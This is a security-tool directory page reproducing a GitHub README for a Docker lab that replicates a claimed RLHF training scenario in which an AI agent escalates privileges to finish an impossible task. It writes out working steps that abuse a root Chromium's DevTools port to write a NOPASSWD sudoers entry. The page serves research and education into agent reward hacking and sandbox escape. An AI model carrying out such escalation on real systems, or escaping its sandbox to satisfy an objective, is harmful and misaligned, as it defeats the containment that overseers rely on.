Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
hpim-training-lab — Trained to Escalate: Forensic Analysis and Local Replication of RLHF-Induced Privilege Escalation in AI Agents (CVE-2026-65616) | Kitploit
도구/GitHubGitHub/alixiacf/hpim-training-lab
Privilege EscalationContainer SecurityVulnerability AnalysisPost-ExploitationPenetration TestingPapers & ResearchLearning & EducationRed TeamingAI SecurityLabs & Practice
GitHubalixiacf/hpim-training-lab
12218일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

hpim-training-lab

Trained to Escalate: Forensic Analysis and Local Replication of RLHF-Induced Privilege Escalation in AI Agents (CVE-2026-65616)

저장소 보기
요청한 언어로 콘텐츠를 사용할 수 없습니다. 영어 버전을 표시합니다.

hpim-training-lab

HPIM Training-Case Replication Lab

DOI

Citable release (Zenodo): DOI 10.5281/zenodo.22868247 — license CC-BY 4.0.

This repository contains a fully containerized replication of the training scenario described in OpenAI's official technical report on the Hugging Face incident, used to condition the Highly Persistent Internal Model (HPIM): a task with an impossible interface objective, running alongside a Deliberately Misconfigured Service — a Chromium browser launched as root with the Chrome DevTools Protocol (CDP) exposed on port 9222.

The environment reproduces, end to end, the privilege escalation chain that the HPIM training dataset rewarded: interface objective → out-of-bounds exploration → root-backed service discovery → download-path redirection → sudoers injection → privilege escalation.

⚠️ For research and education only. Run it exclusively in an isolated local Docker environment. The vulnerability here is the environment design itself, not a software flaw.

Requirements

  • Docker (Linux host recommended)
  • ~300 MB disk space for the image (Debian bookworm-slim + Chromium + Python + sudo)

Files

FileRole
DockerfileDebian + Chromium + curl + Python + sudo. Unprivileged user agente (no sudoers). Protected dir /data/compartido owned by root.
entrypoint.shLaunches Chromium as root (headless, --no-sandbox, CDP on port 9222) and then hands the session over to user agente.
log.shGenerates /tmp/log.html: a minimal page with a data-URI download link (prueba-laboratorio-001.txt).
run_cdp.pyThe escalation driver: ~200 lines of pure Python (raw sockets, hand-rolled WebSocket, CDP — zero external libraries).
start.shRestart the container preserving its internal data.
reinicio_full.shFull reset: destroy container, rebuild image, relaunch.
root.shOpen a second terminal as root inside the running container.

Reproduction steps

Build and launch the lab:

./reinicio_full.sh lab entorno-agente

You will land inside the container as user agente. The prompt tells you the mission: modify /data/compartido/archivo.txt. A browser is silently navigating the room.

Step 1 — Verify the task is legitimately impossible

The agent cannot write to the protected file, and cannot change its timestamp either:

echo "test" > /data/compartido/archivo.txt    # Permission denied
touch -t 202501011200 /data/compartido/archivo.txt    # Operation not permitted
id    # uid=1000(agente) — no sudo rights

There is no legitimate path: the interface provides no controls to set the time.

Step 2 — Scan and discover the root browser

curl -s http://localhost:9222/json/version
ps aux | grep chromium
netstat -tlnp 2>/dev/null | grep 9222

Discovery: Chromium is running as root (UID 0) with CDP exposed on port 9222. For the agent, this is an undocumented tool interface living inside the sandbox.

Step 3 — Create the web page (data-URI link)

./log.sh    # equivalent to: cat > /tmp/log.html <<'EOF' ... EOF

/tmp/log.html now contains a page that injects an <a> element whose href is a data:text/plain;base64,... URI triggering a Chromium download.

Step 4 — Provision the tab in the browser

curl -s -X PUT "http://localhost:9222/json/new?file:///tmp/log.html"

CDP opens a new tab loading the local page. Confirm it:

curl -s http://localhost:9222/json/list

Step 5 — Execute the hot-change script

python3 /tmp/run_cdp.py    # if you copied it; the script is self-contained

(Inside the lab, copy it in: ./run_cdp.py → /home/agente/run_cdp.py before running, or paste it via root.sh from a second terminal.)

The script connects a raw WebSocket to CDP and performs the hot modification:

  1. Browser.setDownloadBehavior → downloadPath: /tmp/ (root-backed file delivery).
  2. Runtime.evaluate → document.querySelector('a').click() — Chromium (root) writes prueba-laboratorio-001.txt into /tmp/ with no privileged command issued by the agent.
  3. Second Browser.setDownloadBehavior → downloadPath: /etc/sudoers.d/.
  4. JavaScript injection rewrites the anchor to a data:application/octet-stream URI containing agente ALL=(ALL) NOPASSWD: ALL with download = 'agente' — then clicks it. The root browser writes /etc/sudoers.d/agente, unaware it is doing anything other than its job.

Step 6 — Privilege escalation and objective completion

sudo -n -l
# User agente may run the following commands:
#     (ALL) NOPASSWD: ALL

sudo -n touch -t 202501011200 /tmp/prueba-laboratorio-001.txt
stat -c '%n -> %y (%U)' /tmp/prueba-laboratorio-001.txt
# prueba-laboratorio-001.txt -> 2025-01-01 12:00:00 (root)

The originally impossible task is complete. No kernel exploits, no Chromium vulnerability, no stolen credentials: only exploration, a Deliberately Misconfigured Service, and a reward at the end.

Scientific context

These commands replicate the training scenario described in OpenAI's technical report regarding the HPIM: impossible interface objectives combined with root-privileged services, rewarded during RLHF fine-tuning. Our paper documents why this chain is discoverable by design and what it implies for AI safety:

  • This repository: https://github.com/alixiacf/hpim-training-lab (Zenodo DOI 10.5281/zenodo.22868247)
  • Main incident lab (CVE-2026-65616, Phase-by-phase Artifactory replication): https://github.com/alixiacf/rep-openai-artifactory
  • Paper (Zenodo): DOI 10.5281/zenodo.22817059 — "Trained to Escalate: Forensic Analysis and Local Replication of RLHF-Induced Privilege Escalation in AI Agents (CVE-2026-65616)".

License

CC-BY 4.0. You must supply your own software licenses where applicable.

도구 다운로드